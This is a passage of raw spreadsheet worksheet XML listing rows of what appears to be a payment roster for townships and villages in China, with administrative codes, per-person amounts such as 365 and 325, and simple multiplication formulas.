        <v>225</v>
      </c>
    </row>
    <row r="2008" customHeight="1" spans="1:11">
      <c r="A2008" s="16" t="s">
        <v>5329</v>
      </c>
      <c r="B2008" s="17" t="str">
        <f>B2007</f>
        <v>皇后乡</v>
      </c>
      <c r="C2008" s="17" t="str">
        <f>C2007</f>
        <v>皇后乡</v>
      </c>
      <c r="D2008" s="16" t="s">
        <v>5330</v>
      </c>
      <c r="E2008" s="16" t="s">
        <v>5331</v>
      </c>
      <c r="F2008" s="17" t="str">
        <f>F2007</f>
        <v>4113210615</v>
      </c>
      <c r="G2008" s="17"/>
      <c r="H2008" s="17"/>
      <c r="I2008" s="17"/>
      <c r="J2008" s="17"/>
      <c r="K2008" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2009" customHeight="1" spans="1:11">
      <c r="A2009" s="16" t="s">
        <v>5332</v>
      </c>
      <c r="B2009" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2009" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2009" s="17" t="s">
        <v>5333</v>
      </c>
      <c r="E2009" s="17" t="s">
        <v>5334</v>
      </c>
      <c r="F2009" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2009" s="17">
        <v>1</v>
      </c>
      <c r="H2009" s="18">
        <v>365</v>
      </c>
      <c r="I2009" s="17">
        <f>H2009*G2009</f>
        <v>365</v>
      </c>
      <c r="J2009" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2009" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2010" customHeight="1" spans="1:11">
      <c r="A2010" s="16" t="s">
        <v>5335</v>
      </c>
      <c r="B2010" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2010" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2010" s="17" t="s">
        <v>5336</v>
      </c>
      <c r="E2010" s="17" t="s">
        <v>5337</v>
      </c>
      <c r="F2010" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2010" s="17">
        <v>2</v>
      </c>
      <c r="H2010" s="18">
        <v>325</v>
      </c>
      <c r="I2010" s="17">
        <f>H2010*G2010</f>
        <v>650</v>
      </c>
      <c r="J2010" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2010" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2011" customHeight="1" spans="1:11">
      <c r="A2011" s="16" t="s">
        <v>5338</v>
      </c>
      <c r="B2011" s="17" t="str">
        <f>B2010</f>
        <v>皇后乡</v>
      </c>
      <c r="C2011" s="17" t="str">
        <f>C2010</f>
        <v>皇后乡</v>
      </c>
      <c r="D2011" s="16" t="s">
        <v>5339</v>
      </c>
      <c r="E2011" s="16" t="s">
        <v>5340</v>
      </c>
      <c r="F2011" s="17" t="str">
        <f>F2010</f>
        <v>4113210615</v>
      </c>
      <c r="G2011" s="17"/>
      <c r="H2011" s="17"/>
      <c r="I2011" s="17"/>
      <c r="J2011" s="17"/>
      <c r="K2011" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2012" customHeight="1" spans="1:11">
      <c r="A2012" s="16" t="s">
        <v>5341</v>
      </c>
      <c r="B2012" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2012" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2012" s="17" t="s">
        <v>5342</v>
      </c>
      <c r="E2012" s="17" t="s">
        <v>4962</v>
      </c>
      <c r="F2012" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2012" s="17">
        <v>2</v>
      </c>
      <c r="H2012" s="18">
        <v>325</v>
      </c>
      <c r="I2012" s="17">
        <f>H2012*G2012</f>
        <v>650</v>
      </c>
      <c r="J2012" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2012" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2013" customHeight="1" spans="1:11">
      <c r="A2013" s="16" t="s">
        <v>5343</v>
      </c>
      <c r="B2013" s="17" t="str">
        <f>B2012</f>
        <v>皇后乡</v>
      </c>
      <c r="C2013" s="17" t="str">
        <f>C2012</f>
        <v>皇后乡</v>
      </c>
      <c r="D2013" s="16" t="s">
        <v>5344</v>
      </c>
      <c r="E2013" s="16" t="s">
        <v>4847</v>
      </c>
      <c r="F2013" s="17" t="str">
        <f>F2012</f>
        <v>4113210615</v>
      </c>
      <c r="G2013" s="17"/>
      <c r="H2013" s="17"/>
      <c r="I2013" s="17"/>
      <c r="J2013" s="17"/>
      <c r="K2013" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2014" customHeight="1" spans="1:11">
      <c r="A2014" s="16" t="s">
        <v>5345</v>
      </c>
      <c r="B2014" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2014" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2014" s="17" t="s">
        <v>5346</v>
      </c>
      <c r="E2014" s="17" t="s">
        <v>4754</v>
      </c>
      <c r="F2014" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2014" s="17">
        <v>1</v>
      </c>
      <c r="H2014" s="18">
        <v>365</v>
      </c>
      <c r="I2014" s="17">
        <f>H2014*G2014</f>
        <v>365</v>
      </c>
      <c r="J2014" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2014" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2015" customHeight="1" spans="1:11">
      <c r="A2015" s="16" t="s">
        <v>5347</v>
      </c>
      <c r="B2015" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2015" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2015" s="17" t="s">
        <v>5348</v>
      </c>
      <c r="E2015" s="17" t="s">
        <v>4865</v>
      </c>
      <c r="F2015" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2015" s="17">
        <v>1</v>
      </c>
      <c r="H2015" s="18">
        <v>365</v>
      </c>
      <c r="I2015" s="17">
        <f t="shared" ref="I2015:I2031" si="100">H2015*G2015</f>
        <v>365</v>
      </c>
      <c r="J2015" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2015" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2016" customHeight="1" spans="1:11">
      <c r="A2016" s="16" t="s">
        <v>5349</v>
      </c>
      <c r="B2016" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2016" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2016" s="17" t="s">
        <v>5350</v>
      </c>
      <c r="E2016" s="17" t="s">
        <v>4862</v>
      </c>
      <c r="F2016" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2016" s="17">
        <v>1</v>
      </c>
      <c r="H2016" s="18">
        <v>365</v>
      </c>
      <c r="I2016" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2016" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2016" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2017" customHeight="1" spans="1:11">
      <c r="A2017" s="16" t="s">
        <v>5351</v>
      </c>
      <c r="B2017" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2017" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2017" s="17" t="s">
        <v>5352</v>
      </c>
      <c r="E2017" s="17" t="s">
        <v>4754</v>
      </c>
      <c r="F2017" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2017" s="17">
        <v>1</v>
      </c>
      <c r="H2017" s="18">
        <v>365</v>
      </c>
      <c r="I2017" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2017" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2017" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2018" customHeight="1" spans="1:11">
      <c r="A2018" s="16" t="s">
        <v>5353</v>
      </c>
      <c r="B2018" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2018" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2018" s="17" t="s">
        <v>5354</v>
      </c>
      <c r="E2018" s="17" t="s">
        <v>5355</v>
      </c>
      <c r="F2018" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2018" s="17">
        <v>1</v>
      </c>
      <c r="H2018" s="18">
        <v>365</v>
      </c>
      <c r="I2018" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2018" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2018" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2019" customHeight="1" spans="1:11">
      <c r="A2019" s="16" t="s">
        <v>5356</v>
      </c>
      <c r="B2019" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2019" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2019" s="17" t="s">
        <v>5357</v>
      </c>
      <c r="E2019" s="17" t="s">
        <v>4997</v>
      </c>
      <c r="F2019" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2019" s="17">
        <v>1</v>
      </c>
      <c r="H2019" s="18">
        <v>365</v>
      </c>
      <c r="I2019" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2019" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2019" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2020" customHeight="1" spans="1:11">
      <c r="A2020" s="16" t="s">
        <v>5358</v>
      </c>
      <c r="B2020" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2020" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2020" s="17" t="s">
        <v>5359</v>
      </c>
      <c r="E2020" s="17" t="s">
        <v>4941</v>
      </c>
      <c r="F2020" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2020" s="17">
        <v>1</v>
      </c>
      <c r="H2020" s="18">
        <v>365</v>
      </c>
      <c r="I2020" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2020" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2020" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2021" customHeight="1" spans="1:11">
      <c r="A2021" s="16" t="s">
        <v>5360</v>
      </c>
      <c r="B2021" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2021" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2021" s="17" t="s">
        <v>5361</v>
      </c>
      <c r="E2021" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F2021" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2021" s="17">
        <v>1</v>
      </c>
      <c r="H2021" s="18">
        <v>365</v>
      </c>
      <c r="I2021" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2021" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2021" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2022" customHeight="1" spans="1:11">
      <c r="A2022" s="16" t="s">
        <v>5362</v>
      </c>
      <c r="B2022" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2022" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2022" s="17" t="s">
        <v>5363</v>
      </c>
      <c r="E2022" s="17" t="s">
        <v>4880</v>
      </c>
      <c r="F2022" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2022" s="17">
        <v>1</v>
      </c>
      <c r="H2022" s="18">
        <v>365</v>
      </c>
      <c r="I2022" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2022" s="17">
        <v>45047</v>
      </c>
      <c r="K2022" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2023" customHeight="1" spans="1:11">
      <c r="A2023" s="16" t="s">
        <v>5364</v>
      </c>
      <c r="B2023" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2023" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2023" s="17" t="s">
        <v>5365</v>
      </c>
      <c r="E2023" s="17" t="s">
        <v>4785</v>
      </c>
      <c r="F2023" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G2023" s="17">
        <v>1</v>
      </c>
      <c r="H2023" s="18">
        <v>365</v>
      </c>
      <c r="I2023" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2023" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2023" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2024" customHeight="1" spans="1:11">
      <c r="A2024" s="16" t="s">
        <v>5366</v>
      </c>
      <c r="B2024" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2024" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2024" s="17" t="s">
        <v>5368</v>
      </c>
      <c r="E2024" s="17" t="s">
        <v>4791</v>
      </c>
      <c r="F2024" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2024" s="17">
        <v>1</v>
      </c>
      <c r="H2024" s="18">
        <v>365</v>
      </c>
      <c r="I2024" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2024" s="29">
        <v>45108</v>
      </c>
      <c r="K2024" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2025" customHeight="1" spans="1:11">
      <c r="A2025" s="16" t="s">
        <v>5370</v>
      </c>
      <c r="B2025" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2025" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2025" s="17" t="s">
        <v>5371</v>
      </c>
      <c r="E2025" s="17" t="s">
        <v>5372</v>
      </c>
      <c r="F2025" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2025" s="17">
        <v>1</v>
      </c>
      <c r="H2025" s="18">
        <v>365</v>
      </c>
      <c r="I2025" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2025" s="29">
        <v>45108</v>
      </c>
      <c r="K2025" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2026" customHeight="1" spans="1:11">
      <c r="A2026" s="16" t="s">
        <v>5373</v>
      </c>
      <c r="B2026" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2026" s="17" t="s">
        <v>5374</v>
      </c>
      <c r="D2026" s="17" t="s">
        <v>5375</v>
      </c>
      <c r="E2026" s="17" t="s">
        <v>4880</v>
      </c>
      <c r="F2026" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2026" s="17">
        <v>1</v>
      </c>
      <c r="H2026" s="18">
        <v>365</v>
      </c>
      <c r="I2026" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2026" s="29">
        <v>45108</v>
      </c>
      <c r="K2026" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2027" customHeight="1" spans="1:11">
      <c r="A2027" s="16" t="s">
        <v>5376</v>
      </c>
      <c r="B2027" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2027" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2027" s="17" t="s">
        <v>5378</v>
      </c>
      <c r="E2027" s="17" t="s">
        <v>4802</v>
      </c>
      <c r="F2027" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2027" s="17">
        <v>1</v>
      </c>
      <c r="H2027" s="18">
        <v>365</v>
      </c>
      <c r="I2027" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2027" s="29">
        <v>45108</v>
      </c>
      <c r="K2027" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2028" customHeight="1" spans="1:11">
      <c r="A2028" s="16" t="s">
        <v>5379</v>
      </c>
      <c r="B2028" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2028" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2028" s="17" t="s">
        <v>5380</v>
      </c>
      <c r="E2028" s="17" t="s">
        <v>5020</v>
      </c>
      <c r="F2028" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2028" s="17">
        <v>1</v>
      </c>
      <c r="H2028" s="18">
        <v>365</v>
      </c>
      <c r="I2028" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2028" s="17">
        <v>45352</v>
      </c>
      <c r="K2028" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2029" customHeight="1" spans="1:11">
      <c r="A2029" s="16" t="s">
        <v>5381</v>
      </c>
      <c r="B2029" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2029" s="17" t="s">
        <v>5382</v>
      </c>
      <c r="D2029" s="17" t="s">
        <v>5383</v>
      </c>
      <c r="E2029" s="17" t="s">
        <v>4852</v>
      </c>
      <c r="F2029" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2029" s="17">
        <v>1</v>
      </c>
      <c r="H2029" s="18">
        <v>365</v>
      </c>
      <c r="I2029" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2029" s="17">
        <v>45413</v>
      </c>
      <c r="K2029" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2030" customHeight="1" spans="1:11">
      <c r="A2030" s="16" t="s">
        <v>5384</v>
      </c>
      <c r="B2030" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2030" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D2030" s="17" t="s">
        <v>5385</v>
      </c>
      <c r="E2030" s="17" t="s">
        <v>5386</v>
      </c>
      <c r="F2030" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2030" s="17">
        <v>1</v>
      </c>
      <c r="H2030" s="18">
        <v>365</v>
      </c>
      <c r="I2030" s="17">
        <f t="shared" si="100"/>
        <v>365</v>
      </c>
      <c r="J2030" s="29">
        <v>45658</v>
      </c>
      <c r="K2030" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2031" customHeight="1" spans="1:11">
      <c r="A2031" s="16" t="s">
        <v>5387</v>
      </c>
      <c r="B2031" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2031" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2031" s="17" t="s">
        <v>5388</v>
      </c>
      <c r="E2031" s="17" t="s">
        <v>5389</v>
      </c>
      <c r="F2031" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2031" s="17">
        <v>3</v>
      </c>
      <c r="H2031" s="18">
        <v>290</v>
      </c>
      <c r="I2031" s="17">
        <f t="shared" si="100"/>
        <v>870</v>
      </c>
      <c r="J2031" s="29">
        <v>45108</v>
      </c>
      <c r="K2031" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2032" customHeight="1" spans="1:11">
      <c r="A2032" s="16" t="s">
        <v>5390</v>
      </c>
      <c r="B2032" s="17" t="str">
        <f>B2031</f>
        <v>皇后乡</v>
      </c>
      <c r="C2032" s="17" t="str">
        <f>C2031</f>
        <v>县社</v>
      </c>
      <c r="D2032" s="16" t="s">
        <v>5391</v>
      </c>
      <c r="E2032" s="16" t="s">
        <v>3779</v>
      </c>
      <c r="F2032" s="17" t="str">
        <f>F2031</f>
        <v>4113210699</v>
      </c>
      <c r="G2032" s="17"/>
      <c r="H2032" s="17"/>
      <c r="I2032" s="17"/>
      <c r="J2032" s="29"/>
      <c r="K2032" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2033" customHeight="1" spans="1:11">
      <c r="A2033" s="16" t="s">
        <v>5392</v>
      </c>
      <c r="B2033" s="17" t="str">
        <f>B2032</f>
        <v>皇后乡</v>
      </c>
      <c r="C2033" s="17" t="str">
        <f>C2032</f>
        <v>县社</v>
      </c>
      <c r="D2033" s="16" t="s">
        <v>5393</v>
      </c>
      <c r="E2033" s="24" t="s">
        <v>5394</v>
      </c>
      <c r="F2033" s="17" t="str">
        <f>F2032</f>
        <v>4113210699</v>
      </c>
      <c r="G2033" s="17"/>
      <c r="H2033" s="17"/>
      <c r="I2033" s="17"/>
      <c r="J2033" s="29"/>
      <c r="K2033" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2034" customHeight="1" spans="1:11">
      <c r="A2034" s="16" t="s">
        <v>5395</v>
      </c>
      <c r="B2034" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C2034" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2034" s="17" t="s">
        <v>5396</v>
      </c>
      <c r="E2034" s="17" t="s">
        <v>4779</v>
      </c>
      <c r="F2034" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2034" s="17">
        <v>1</v>
      </c>
      <c r="H2034" s="18">
        <v>365</v>
      </c>
      <c r="I2034" s="17">
        <f t="shared" ref="I2034:I2041" si="101">H2034*G2034</f>
        <v>365</v>
      </c>
      <c r="J2034" s="29">
        <v>45108</v>
      </c>
      <c r="K2034" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2035" customHeight="1" spans="1:11">
      <c r="A2035" s="16" t="s">
        <v>5397</v>
      </c>
      <c r="B2035" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2035" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2035" s="17" t="s">
        <v>5400</v>
      </c>
      <c r="E2035" s="17" t="s">
        <v>5401</v>
      </c>
      <c r="F2035" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2035" s="17">
        <v>1</v>
      </c>
      <c r="H2035" s="18">
        <v>365</v>
      </c>
      <c r="I2035" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2035" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2035" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2036" customHeight="1" spans="1:11">
      <c r="A2036" s="16" t="s">
        <v>5402</v>
      </c>
      <c r="B2036" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2036" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2036" s="17" t="s">
        <v>5403</v>
      </c>
      <c r="E2036" s="17" t="s">
        <v>4380</v>
      </c>
      <c r="F2036" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2036" s="17">
        <v>1</v>
      </c>
      <c r="H2036" s="18">
        <v>365</v>
      </c>
      <c r="I2036" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2036" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2036" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2037" customHeight="1" spans="1:11">
      <c r="A2037" s="16" t="s">
        <v>5404</v>
      </c>
      <c r="B2037" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2037" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2037" s="17" t="s">
        <v>5405</v>
      </c>
      <c r="E2037" s="17" t="s">
        <v>5406</v>
      </c>
      <c r="F2037" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2037" s="17">
        <v>1</v>
      </c>
      <c r="H2037" s="18">
        <v>365</v>
      </c>
      <c r="I2037" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2037" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2037" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2038" customHeight="1" spans="1:11">
      <c r="A2038" s="16" t="s">
        <v>5407</v>
      </c>
      <c r="B2038" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2038" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2038" s="17" t="s">
        <v>5408</v>
      </c>
      <c r="E2038" s="17" t="s">
        <v>5409</v>
      </c>
      <c r="F2038" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2038" s="17">
        <v>1</v>
      </c>
      <c r="H2038" s="18">
        <v>365</v>
      </c>
      <c r="I2038" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2038" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2038" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2039" customHeight="1" spans="1:11">
      <c r="A2039" s="16" t="s">
        <v>5410</v>
      </c>
      <c r="B2039" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2039" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2039" s="17" t="s">
        <v>5411</v>
      </c>
      <c r="E2039" s="17" t="s">
        <v>5085</v>
      </c>
      <c r="F2039" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2039" s="17">
        <v>1</v>
      </c>
      <c r="H2039" s="18">
        <v>365</v>
      </c>
      <c r="I2039" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2039" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2039" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2040" customHeight="1" spans="1:11">
      <c r="A2040" s="16" t="s">
        <v>5412</v>
      </c>
      <c r="B2040" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2040" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2040" s="17" t="s">
        <v>5413</v>
      </c>
      <c r="E2040" s="17" t="s">
        <v>5414</v>
      </c>
      <c r="F2040" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2040" s="17">
        <v>1</v>
      </c>
      <c r="H2040" s="18">
        <v>365</v>
      </c>
      <c r="I2040" s="17">
        <f t="shared" si="101"/>
        <v>365</v>
      </c>
      <c r="J2040" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2040" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2041" customHeight="1" spans="1:11">
      <c r="A2041" s="16" t="s">
        <v>5415</v>
      </c>
      <c r="B2041" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2041" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2041" s="17" t="s">
        <v>5416</v>
      </c>
      <c r="E2041" s="17" t="s">
        <v>5417</v>
      </c>
      <c r="F2041" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2041" s="17">
        <v>2</v>
      </c>
      <c r="H2041" s="18">
        <v>325</v>
      </c>
      <c r="I2041" s="17">
        <f t="shared" si="101"/>
        <v>650</v>
      </c>
      <c r="J2041" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2041" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2042" customHeight="1" spans="1:11">
      <c r="A2042" s="16" t="s">
        <v>5418</v>
      </c>
      <c r="B2042" s="17" t="str">
        <f>B2041</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2042" s="17" t="str">
        <f>C2041</f>
        <v>毛庄村</v>
      </c>
      <c r="D2042" s="16" t="s">
        <v>5419</v>
      </c>
      <c r="E2042" s="16" t="s">
        <v>5420</v>
      </c>
      <c r="F2042" s="17">
        <f>F2041</f>
        <v>4113210704</v>
      </c>
      <c r="G2042" s="17"/>
      <c r="H2042" s="17"/>
      <c r="I2042" s="17"/>
      <c r="J2042" s="17"/>
      <c r="K2042" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2043" customHeight="1" spans="1:11">
      <c r="A2043" s="16" t="s">
        <v>5421</v>
      </c>
      <c r="B2043" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2043" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2043" s="17" t="s">
        <v>5422</v>
      </c>
      <c r="E2043" s="17" t="s">
        <v>5423</v>
      </c>
      <c r="F2043" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2043" s="17">
        <v>1</v>
      </c>
      <c r="H2043" s="18">
        <v>365</v>
      </c>
      <c r="I2043" s="17">
        <f t="shared" ref="I2043:I2055" si="102">H2043*G2043</f>
        <v>365</v>
      </c>
      <c r="J2043" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2043" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2044" customHeight="1" spans="1:11">
      <c r="A2044" s="16" t="s">
        <v>5424</v>
      </c>
      <c r="B2044" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2044" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2044" s="17" t="s">
        <v>5425</v>
      </c>
      <c r="E2044" s="17" t="s">
        <v>5426</v>
      </c>
      <c r="F2044" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2044" s="17">
        <v>1</v>
      </c>
      <c r="H2044" s="18">
        <v>365</v>
      </c>
      <c r="I2044" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2044" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2044" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2045" customHeight="1" spans="1:11">
      <c r="A2045" s="16" t="s">
        <v>5427</v>
      </c>
      <c r="B2045" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2045" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2045" s="17" t="s">
        <v>5428</v>
      </c>
      <c r="E2045" s="17" t="s">
        <v>2806</v>
      </c>
      <c r="F2045" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2045" s="17">
        <v>1</v>
      </c>
      <c r="H2045" s="18">
        <v>365</v>
      </c>
      <c r="I2045" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2045" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2045" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2046" customHeight="1" spans="1:11">
      <c r="A2046" s="16" t="s">
        <v>5429</v>
      </c>
      <c r="B2046" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2046" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2046" s="17" t="s">
        <v>5430</v>
      </c>
      <c r="E2046" s="17" t="s">
        <v>5431</v>
      </c>
      <c r="F2046" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2046" s="17">
        <v>1</v>
      </c>
      <c r="H2046" s="18">
        <v>365</v>
      </c>
      <c r="I2046" s="17">
        <f t="shared" si="102"/>
        <v>365</v>
      </c>
      <c r="J2046" s="17" t="s">
        <v>224</v>
      </c>
